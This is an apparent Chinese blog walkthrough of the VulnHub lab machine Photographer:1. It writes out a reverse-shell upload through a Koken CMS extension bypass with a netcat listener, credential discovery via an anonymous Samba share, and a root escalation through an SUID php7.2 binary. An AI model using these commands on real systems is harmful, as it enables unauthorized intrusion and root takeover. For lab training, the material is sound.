点击蓝字
关注我们
0x00
靶机信息
靶机:Photographerr:1
难度:中
下载:https://www.vulnhub.com/entry/photographer-1,519/
0x01
信息收集
靶场网段:192.168.12.0/24
Nmap扫描靶场网段,寻找目标靶机IP以及相关端口服务
发现3个疑似IP,尝试访问这些IP的Web服务来快速判断哪个是靶机IP
访问192.168.12.142成功,根据网页内容确定是这个IP,接下来获取端口服务信息
开放端口:80,139,445,8000
刚刚已经访问过80端口的页面了,静态页面,暂时没有找到有价值的地方
访问8000端口,发现是一个Koken的CMS网站 版本0.22.24
扫下目录
访问admin后台页面
后台账号格式为邮箱,因为不知道邮箱,也没有办法去进行爆破,在exp库中找到koken版本0.22.24的上传漏洞
遗憾的是这个上传漏洞是后期的,现在需要先登入后台,才可以利用这个漏洞
继续探索其他端口,使用enum4linux探索445端口
Samba服务,连接上去看看有没有上面信息
匿名连接上去发现两个文件,一个txt文本一个压缩包
Txt文本内是一封邮件,这里我们就得到了邮箱号,密码应该是babygirl
尝试登入一下
登入成功,接下来就可以利用上传漏洞了
0x02
漏洞利用
使用Kali自带的php反弹脚本来进行利用
cp /usr/share/webshells/php/php-reverse-shell.php ~/bachangshijie.php.jpg先copy出来,然后修改接收反弹的IP和端口
接下来上传,使用burp修改后缀名
上传完成
在content中找到我们刚刚上传的,并访问,kali设置监听
nc -lvnp 1100
成功获取到shell
0x03
提权
获取交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看suid权限的程序文件
find / -perm -u=s -type f 2>/dev/null
有一个php7.2,那就用他来提权
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
至此通关
扫二维码|关注我们
微信号|靶机世界
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论